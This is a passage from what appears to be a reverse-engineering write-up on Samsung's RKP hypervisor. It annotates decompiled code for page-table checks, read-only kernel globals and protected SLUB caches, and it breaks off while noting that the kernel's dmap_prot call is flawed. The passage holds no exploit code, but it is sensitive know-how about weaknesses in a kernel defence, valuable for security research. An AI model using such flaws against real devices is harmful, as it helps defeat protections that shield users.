rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
}
// Page descriptor, if the virtual address mapped by this descriptor is not executable, then set the PXN bit.
if (!executable_regions_contains(addr, 3)) {
set_pxn_bit_of_desc(desc_p, 3);
}
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
(addr >> 21) & 0x1ff);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
// If we are retiring this PT.
else {
// If it is not marked as a PT in the physmap, return without processing it.
if (!is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
// Mark the PT as `FREE` in the physmap.
res = rkp_phys_map_set(pte, FREE);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
// Protected PTs are not allowed to be retired, so trigger a violation. If we did not panic, continue.
rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
// Make the PT writable in the second stage.
res = rkp_s2_page_change_permission(pte, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
rkp_phys_map_unlock(pte);
return res;
}
// Now iterate over each descriptor of the PT.
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xffffffffffe00fff;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
// Invalid descriptor, trigger a violation.
if ((desc & 0b11) != 0b11) {
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
}
// Page descriptor, if the virtual address mapped by this descriptor is executable, trigger a violation.
if (executable_regions_contains(addr, 3)) {
rkp_policy_violation("RKP_b5438cb1");
}
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
(addr >> 21) & 0x1ff);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
rkp_phys_map_unlock(pte);
return 0;
}
If functions processing the kernel page tables find something they consider a policy violation, they call rkp_policy_violation
with a string that describes the violation as an argument. This function logs the message and calls uh_panic
if rkp_panic_on_violation
is set.
int64_t rkp_policy_violation(const char* message, ...) {
// ...
// Log the violation message and its arguments.
res = rkp_log(0x4c, "rkp.c", 108, message, /* variable arguments */);
// Panic if panic on violation is enabled.
if (rkp_panic_on_violation) {
uh_panic();
}
return res;
}
rkp_log
is a wrapper around uh_log
that adds the current time and CPU number to the message. It also calls bigdata_store_rkp_string
to copy the formatted message to the analytics, or bigdata, region.
This section serves as a reference of the overall state after startup (normal and deferred) is finished. We go over each of the internal structures of RKP, as well as the hypervisor-controlled page tables, and detail their content and where it was added or removed.
The memlists:

- dynamic_regions
  - created in uh_init
  - memory regions added in init_cmd_add_dynamic_region
  - removed in init_cmd_initialize_dynamic_heap
- protected_ranges
  - created in pa_restrict_init
  - hypervisor memory added in pa_restrict_init
  - physmap added in init_cmd_initialize_dynamic_heap
- page_allocator.list
  - created and filled in init_cmd_initialize_dynamic_heap
- executable_regions
  - created in rkp_start
  - kernel text (TEXT-ETEXT) added in rkp_start
  - TRAMP_VALIAS page added in rkp_start
  - regions added (dynamic_load_ins) and removed (dynamic_load_rm) by the dynamic executable loading feature
- dynamic_load_regions
  - created in rkp_start
  - regions added (dynamic_load_add_dynlist) and removed (dynamic_load_rm_dynlist)

The sparsemaps:

- physmap (based on dynamic_regions)
  - created in init_cmd_initialize_dynamic_heap
  - kernel text (TEXT-ETEXT) set as TEXT in rkp_paging_init
  - user PGD (from TTBR0_EL1) set as L1 in rkp_l1pgt_process_table
  - user PMDs set as L2 in rkp_l2pgt_process_table
  - user PTs set as L3, where the VA is in executable_regions, in rkp_l3pgt_process_table
  - kernel PGDs (swapper|tramp_pg_dir) set as KERNEL|L1 in rkp_l1pgt_process_table
  - kernel PMDs set as KERNEL|L2 in rkp_l2pgt_process_table
  - kernel PTs set as KERNEL|L3, where the VA is in executable_regions, in rkp_l3pgt_process_table
  - entries also updated when tables are retired (rkp_lxpgt_process_table), and in (set_range_to_pxn|rox_l3) and (rkp_set_pages_ro, rkp_ro_free_pages)
- ro_bitmap (based on dynamic_regions)
  - created in init_cmd_initialize_dynamic_heap
  - kernel rodata (ETEXT-ERODATA) set as 1 in rkp_set_kernel_rox
  - entries also updated in (rkp_s2_page_change_permission) and (rkp_s2_range_change_permission)
- dbl_bitmap (based on dynamic_regions)
  - created in init_cmd_initialize_dynamic_heap
  - entries updated in (rkp_set_map_bitmap)
- robuf / page_allocator.map (based on dynamic_regions)
  - created in init_cmd_initialize_dynamic_heap
  - entries updated in (page_allocator_alloc_page) and (page_allocator_free_page)

The hypervisor stage 1 page tables (TTBR0_EL2):

- regions mapped in memory_init, uh_init_bigdata, and init_cmd_initialize_dynamic_heap
- kernel text (TEXT-ETEXT) mapped RO in rkp_paging_init
- swapper_pg_dir page mapped RW in rkp_paging_init

The kernel stage 2 page tables (VTTBR_EL2):

- regions mapped in init_cmd_initialize_dynamic_heap, and the hypervisor memory unmapped in rkp_paging_init
- empty_zero_page page mapped as RWX in rkp_paging_init
- TEXT-ERODATA mapped as RWX in rkp_set_kernel_rox (from rkp_paging_init)
- log region and dynamic heap region mapped as RO in rkp_paging_init
- user PGD (from TTBR0_EL1) mapped as RO in rkp_l1pgt_process_table, with the PXN bit set on block descriptors and on table descriptors where VA < 0x8000000000
- user PMDs mapped as RO in rkp_l2pgt_process_table, with the PXN bit set on descriptors where the VA is not in executable_regions (in check_single_l2e)
- user PTs mapped as RO, where the VA is in executable_regions, in rkp_l3pgt_process_table
- TEXT-ERODATA mapped as ROX in rkp_set_kernel_rox (from rkp_deferred_start)
- kernel PGDs (swapper|tramp_pg_dir) mapped as RO in rkp_l1pgt_process_table, with the PXN bit set on block descriptors and on table descriptors where VA < 0x8000000000
- kernel PMDs mapped as RO in rkp_l2pgt_process_table, with the PXN bit set on descriptors where the VA is not in executable_regions (in check_single_l2e)
- kernel PTs mapped as RO, where the VA is in executable_regions, in rkp_l3pgt_process_table, with the PXN bit set on descriptors where the VA is not in executable_regions
We have seen in the previous sections how RKP manages to take full control of the kernel page tables and what it does when it processes them. We will now see how this is used to protect critical kernel data, mainly by allocating it on read-only pages and requiring HVC to modify it.
All the global variables that need to be protected by RKP are annotated with either __rkp_ro or __kdp_ro in the kernel sources. These macros move the global variables to the .rkp_ro and .kdp_ro sections, respectively.
#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif
These sections are part of the kernel's .rodata section, which is made read-only in the second stage in rkp_set_kernel_rox.
#define RO_DATA_SECTION(align)                                           \
    /* ... */                                                             \
.rkp_ro : AT(ADDR(.rkp_ro) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start_rkp_ro) = .; \
*(.rkp_ro) \
VMLINUX_SYMBOL(__stop_rkp_ro) = .; \
VMLINUX_SYMBOL(__start_kdp_ro) = .; \
*(.kdp_ro) \
VMLINUX_SYMBOL(__stop_kdp_ro) = .; \
VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .; \
RKP_RO_PGT \
VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .; \
} \
Below is a list of all the global variables that are protected that way.
- empty_zero_page: special page used for zero-initialized data and copy-on-write.

unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;

- bm_pte, bm_pmd, bm_pud: PTEs, PMDs, and PUDs of the fixmap.

static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;

- sys_sb, odm_sb, vendor_sb, art_sb, rootfs_sb: (Samsung) superblocks of mount namespaces to be protected by RKP.

struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
struct super_block *rootfs_sb __kdp_ro = NULL;

- is_recovery: (Samsung) indicates the device is in recovery mode.

int is_recovery __kdp_ro = 0;

- rkp_init_data: (Samsung) argument structure passed to rkp_start.

rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };

- rkp_s_bitmap_ro, rkp_s_bitmap_dbl, rkp_s_bitmap_buffer: (Samsung) the 3 kernel bitmaps we saw in RKP Bitmaps.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;

- __check_verifiedboot: (Samsung) indicates that the VB state is orange.

int __check_verifiedboot __kdp_ro = 0;

- rkp_cred_enable: (Samsung) indicates that RKP protects the tasks' credentials.

int rkp_cred_enable __kdp_ro = 0;

- init_cred: the credentials of the init task.

struct cred init_cred __kdp_ro = { /* ... */ };

- init_sec: (Samsung) the security context of the init task.

struct task_security_struct init_sec __kdp_ro;

- selinux_enforcing: indicates that SELinux is enforcing and not permissive.

int selinux_enforcing __kdp_ro;

- selinux_enabled: indicates that SELinux is enabled.

int selinux_enabled __kdp_ro = 1;

- selinux_hooks: array containing all security hooks.

static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };

- ss_initialized: indicates that the SELinux policy has been loaded.

int ss_initialized __kdp_ro;
RKP not only protects the global variables, but it also protects specific caches of the SLUB allocator by using read-only pages for those. These pages come from the hypervisor page allocator, and not the kernel one. There are 3 caches that are protected that way:
- cred_jar_ro, used for allocating struct cred;
- tsec_jar, used for allocating struct task_security_struct;
- vfsmnt_cache, used for allocating struct vfsmount.

#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR "tsec_jar"
#define VFSMNT_JAR "vfsmnt_cache"
The read-only pages are allocated by the rkp_ro_alloc
function, which invokes the RKP_RKP_ROBUFFER_ALLOC
command.
static inline void *rkp_ro_alloc(void){
u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
if(!addr)
return 0;
return (void *)__phys_to_virt(addr);
}
Unsurprisingly, the allocate_slab
function of the SLUB allocator calls rkp_ro_alloc
if the cache is one of the three mentioned above. It then calls a command to inform RKP of the cache type: RKP_KDP_X50
for cred_jar
, RKP_KDP_X4E
for tsec_jar
, and RKP_KDP_X4F
for vfsmnt_jar
.
static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
// ...
if (s->name &&
(!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR)||
!strcmp(s->name, VFSMNT_JAR))) {
virt_page = rkp_ro_alloc();
if(!virt_page)
goto def_alloc;
page = virt_to_page(virt_page);
oo = s->min;
} else {
// ...
/*
* We modify the following so that slab alloc for protected data
* types are allocated from our own pool.
*/
if (s->name) {
u64 sc,va_page;
va_page = (u64)__va(page_to_phys(page));
if(!strcmp(s->name, CRED_JAR_RO)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, TSEC_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, VFSMNT_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
}
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
// ...
}
The read-only pages are freed by the rkp_ro_free
function, which invokes the RKP_RKP_ROBUFFER_FREE
command.
static inline void rkp_ro_free(void *free_addr){
uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}
This function is called from free_ro_pages
in the SLUB allocator, which iterates over all the pages to free. In addition to calling rkp_ro_free
, it also invokes the command RKP_KDP_X48
, which reverts changes made by the RKP_KDP_X50
, RKP_KDP_X4E
, and RKP_KDP_X4F
commands.
static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
unsigned long flags;
unsigned long long sc,va_page;
sc = 0;
va_page = (unsigned long long)__va(page_to_phys(page));
if(is_rkp_ro_page(va_page)){
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
rkp_ro_free((void *)va_page);
va_page += PAGE_SIZE;
}
return;
}
spin_lock_irqsave(&ro_pages_lock,flags);
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
memcg_uncharge_slab(page, order, s);
__free_pages(page, order);
spin_unlock_irqrestore(&ro_pages_lock,flags);
}
And unsurprisingly, the __free_slab
function of the SLUB allocator calls free_ro_pages
if the cache is one of the three mentioned above.
static void __free_slab(struct kmem_cache *s, struct page *page)
{
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
// ...
/* We free the protected pages here. */
if (s->name && (!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))){
free_ro_pages(s,page, order);
return;
}
// ...
}
Because the pages of these caches are read-only, the kernel cannot update the freelist pointer of their objects and needs to call into the hypervisor. That is why the set_freepointer
function of the SLUB allocator invokes the RKP_KDP_X44
command if the cache is one of the three mentioned above.
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
// ...
if (rkp_cred_enable && s->name &&
(!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))) {
uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
(u64)freelist_ptr(s, fp, freeptr_addr), 0);
}
// ...
}
One last feature of RKP related to the SLUB allocator is double-mapping prevention. You might have noticed, in the allocate_slab
and __free_slab
functions, calls to dmap_prot
. It invokes the RKP_KDP_X4A
command to notify the hypervisor that this address is being mapped.
static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
if(rkp_cred_enable)
uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}
The cred_jar_ro
and tsec_jar
caches are created in cred_init
. However, this function also invokes the RKP_KDP_X42
command to inform RKP of the size of the cred
and task_security_struct
structures so that it can handle them properly.
void __init cred_init(void)
{
// ...
#ifdef CONFIG_RKP_KDP
if(rkp_cred_enable) {
cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
if(!cred_jar_ro) {
panic("Unable to create RO Cred cache\n");
}
tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
if(!tsec_jar) {
panic("Unable to create RO security cache\n");
}
// ...
uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
}
#endif /* CONFIG_RKP_KDP */
}
Similarly, the vfsmnt_cache
cache is created in mnt_init
. This function invokes the RKP_KDP_X41
command to inform RKP of the total size and offsets of various fields of the vfsmount
structure.
void __init mnt_init(void)
{
// ...
vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);
if(!vfsmnt_cache)
panic("Failed to allocate vfsmnt_cache \n");
rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
(u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
(u64)offsetof(struct vfsmount,data));
uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
// ...
}
For reference, here is the structure ns_param_t
given as an argument to the command:
typedef struct ns_param {
u32 ns_buff_size;
u32 ns_size;
u32 bp_offset;
u32 sb_offset;
u32 flag_offset;
u32 data_offset;
}ns_param_t;
And the rkp_ns_fill_params
macro used to fill this structure is as follows:
#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data) \
do { \
nsparam.ns_buff_size = (u64)buff_size; \
nsparam.ns_size = (u64)size; \
nsparam.bp_offset = (u64)bp; \
nsparam.sb_offset = (u64)sb; \
nsparam.flag_offset = (u64)flag; \
nsparam.data_offset = (u64)data; \
} while(0)
The mnt_init
function initializing the vfsmnt_cache
cache is called from vfs_caches_init
.
void __init vfs_caches_init(void)
{
// ...
mnt_init();
// ...
}
And the cred_init
function, initializing the cred_jar_ro
and tsec_jar
cache, and the vfs_caches_init
function, are called from start_kernel
.
asmlinkage __visible void __init start_kernel(void)
{
// ...
cred_init();
// ...
vfs_caches_init();
// ...
}
We have summarized which RKP commands are used by the SLUB allocator and for what purpose in the following table:
Command | Function | Description |
---|---|---|
RKP_RKP_ROBUFFER_ALLOC | rkp_cmd_rkp_robuffer_alloc | Allocate a read-only page |
RKP_RKP_ROBUFFER_FREE | rkp_cmd_rkp_robuffer_free | Free a read-only page |
RKP_KDP_X50 | rkp_cmd_set_pages_ro_cred_jar | Mark a slab of cred_jar |
RKP_KDP_X4E | rkp_cmd_set_pages_ro_tsec_jar | Mark a slab of tsec_jar |
RKP_KDP_X4F | rkp_cmd_set_pages_ro_vfsmnt_jar | Mark a slab of vfsmnt_jar |
RKP_KDP_X48 | rkp_cmd_ro_free_pages | Unmark a slab |
RKP_KDP_X44 | rkp_cmd_cred_set_fp | Set the freelist pointer inside an object |
RKP_KDP_X4A | rkp_cmd_prot_dble_map | Prevent double mapping |
RKP_KDP_X42 | rkp_cmd_assign_cred_size | Inform of the cred objects size |
RKP_KDP_X41 | rkp_cmd_assign_ns_size | Inform of the ns objects size |
We can now take a look at the hypervisor side of these commands, starting with the functions to allocate and free read-only pages.
rkp_cmd_rkp_robuffer_alloc
simply allocates a page from the hypervisor page allocator (which uses the "robuf" region that we have seen earlier). The ha1
/ha2
stuff is only used by the RKP test module and can be safely ignored.
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
// Request a page from the hypervisor page allocator.
page = page_allocator_alloc_page();
ret_p = regs->x2;
// The following code is only used for testing purposes.
if ((ret_p & 1) != 0) {
if (ha1 != 0 || ha2 != 0) {
rkp_policy_violation("Setting ha1 or ha2 should be done once");
}
ret_p &= 0xfffffffffffffffe;
ha1 = page;
ha2 = page + 8;
}
// If x2 contains a kernel pointer, store the page address into it.
if (ret_p) {
if (!page) {
uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
}
*virt_to_phys_el1(ret_p) = page;
}
// Also store the page address into the x0 register.
regs->x0 = page;
return 0;
}
Similarly, rkp_cmd_rkp_robuffer_free
simply gives the page back to the hypervisor page allocator.
int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
// ...
// Sanity-checking on the page address in x2.
if (!regs->x2) {
uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
}
// Convert the VA given by the kernel into a PA.
page = rkp_get_pa(regs->x2);
// Free the page in the hypervisor page allocator.
page_allocator_free_page(page);
return 0;
}
The rkp_cmd_set_pages_ro_cred_jar
, rkp_cmd_set_pages_ro_tsec_jar
, and rkp_cmd_set_pages_ro_vfsmnt_jar
functions are called by the kernel to inform the hypervisor of the cache type that a read-only page has been allocated for. These functions all end up calling rkp_set_pages_ro
, but with different arguments.
The rkp_set_pages_ro
function converts the kernel VA into a PA, then marks the page read-only in the second stage. It then fills the page with 0xff bytes and marks it with the appropriate type (CRED
, SEC_PTR
, or NS
) in the physmap.
uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
// ...
// Sanity-check: the kernel virtual address must be page-aligned.
if ((regs->x2 & 0xfff) != 0) {
return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
}
// Convert the kernel virtual address into a physical address.
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
// Make the target page read-only in the second stage.
if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
} else {
// Reset the page to avoid leaking previous content.
memset(page, 0xff, 0x1000);
// Compute the corresponding type based on the argument.
switch (type) {
case 0:
type = CRED;
break;
case 1:
type = SEC_PTR;
break;
case 2:
type = NS;
break;
}
// Mark the page in the physmap.
rkp_phys_map_set(page, type);
return rkp_phys_map_unlock(page);
}
return rkp_phys_map_unlock(page);
}
The rkp_cmd_ro_free_pages
function is called to revert the above changes when the page is being freed. It calls rkp_ro_free_pages
, which also converts the kernel VA into a PA and verifies that it is marked with the expected type in the physmap. If everything is good, it makes the page writable in the second stage, zeroes it out again, and marks it as FREE
in the physmap.
uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
// ...
// Sanity-check: the kernel virtual address must be page-aligned.
if ((regs->x2 & 0xfff) != 0) {
return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
}
// Convert the kernel virtual address into a physical address.
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
// Check if the page is marked with the appropriate type in the physmap.
if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
return rkp_phys_map_unlock(page);
}
// Make the target page writable in the second stage.
if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
return rkp_phys_map_unlock(page);
}
// Reset the page to avoid leaking current content.
memset(page, 0, 0x1000);
// Mark the page as `FREE` in the physmap.
rkp_phys_map_set(page, FREE);
return rkp_phys_map_unlock(page);
}
The rkp_cred_set_fp
function is called by the SLUB allocator to change the freelist pointer (pointer to the next free object) of a read-only object. It ensures that the object is marked with the appropriate type in the physmap and that the next freelist pointer is marked with the same type. It does some sanity-checking on the object address and pointer offset before finally updating the freelist pointer within the object.
void rkp_cred_set_fp(saved_regs_t* regs) {
// ...
// Convert the object virtual address into a physical address.
object_pa = rkp_get_pa(regs->x2);
// `offset` is the offset of the freelist pointer in the object.
offset = regs->x3;
// `freelist_ptr` is the value to be written at `offset` in the object.
freelist_ptr = regs->x4;
rkp_phys_map_lock(object_pa);
// Ensure the object is located in one of the 3 caches.
if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(object_pa);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
// If not, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(object_pa);
}
rkp_phys_map_unlock(object_pa);
// If the freelist pointer (next free object) is not NULL.
if (freelist_ptr) {
// Convert the next free object VA into a PA.
freelist_ptr_pa = rkp_get_pa(freelist_ptr);
rkp_phys_map_lock(freelist_ptr_pa);
// Ensure the next free object is also located in one of the 3 caches.
if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
!is_phys_map_ns(freelist_ptr_pa)) {
uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(freelist_ptr_pa);
is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
// If not, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(freelist_ptr_pa);
}
rkp_phys_map_unlock(freelist_ptr_pa);
}
// Sanity-checking on the object address within the page and freelist pointer offset.
if (invalid_cred_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
}
// Update the freelist pointer within the object if the checks passed.
else {
*(offset + object_pa) = freelist_ptr;
}
}
The invalid_cred_fp
, invalid_sec_ptr_fp
, and invalid_ns_fp
functions all do the same checks. They ensure the object PA is marked with the appropriate type in the physmap, that the VA is aligned on the object size, and finally that the freelist pointer offset is equal to the object size (which is the case for caches with a constructor).
int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `CRED` in the physmap.
if (!is_phys_map_cred(object_pa) ||
// Ensure the object VA is aligned on the size of the cred structure.
object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
// Ensure the offset is equal to the size of the cred structure.
rkp_cred->CRED_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `SEC_PTR` in the physmap.
if (!is_phys_map_sec_ptr(object_pa) ||
// Ensure the object VA is aligned on the size of the task_security_struct structure.
object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
// Ensure the offset is equal to the size of the task_security_struct structure.
rkp_cred->SP_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `NS` in the physmap.
if (!is_phys_map_ns(object_pa) ||
// Ensure the object VA is aligned on the size of the vfsmount structure.
object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
// Ensure the offset is equal to the size of the vfsmount structure.
rkp_cred->NS_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
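As a side note on the last check: SLUB only stores the freelist pointer outside of the object (at an offset equal to the object size) when the cache has a constructor, which is precisely how the read-only caches are created on the kernel side. A minimal sketch of such a cache creation, with an assumed constructor name, would look like this:
/* Sketch only: because a constructor is provided, SLUB places the freelist
 * pointer after the object, so the offset received by rkp_cred_set_fp is
 * expected to be equal to CRED_SIZE (resp. SP_SIZE, NS_SIZE). */
cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                                0, SLAB_HWCACHE_ALIGN | SLAB_PANIC,
                                cred_ctor /* assumed constructor name */);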
The rkp_cmd_prot_dble_map
function is called to inform the hypervisor that one or multiple pages are being mapped or unmapped, with the end goal being to prevent double mapping. This function calls rkp_prot_dble_map
, which sets or unsets the bits of dbl_bitmap
for each page of the region.
saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
// ...
  // Mask the base address so that it is page-aligned, and ensure it is not NULL.
address = regs->x2 & 0xfffffffff000;
if (!address) {
return 0;
}
// The value to put in the bitmap (0 = unmapped, 1 = mapped).
val = regs->x4;
if (val > 1) {
uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
return 0;
}
// The order, from which the size of the region can be calculated.
order = regs->x3;
if (order <= 19) {
offset = 0;
size = 0x1000 << order;
// Iterate over all the pages in the target region.
do {
// Set the `dbl_bitmap` value for the current page.
res = rkp_set_map_bitmap(address + offset, val);
if (!res) {
uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
}
offset += 0x1000;
} while (offset < size);
}
}
The attentive reader will have noticed that the kernel function dmap_prot
doesn't call the hypervisor function rkp_prot_dble_map
properly: it doesn't give it its addr
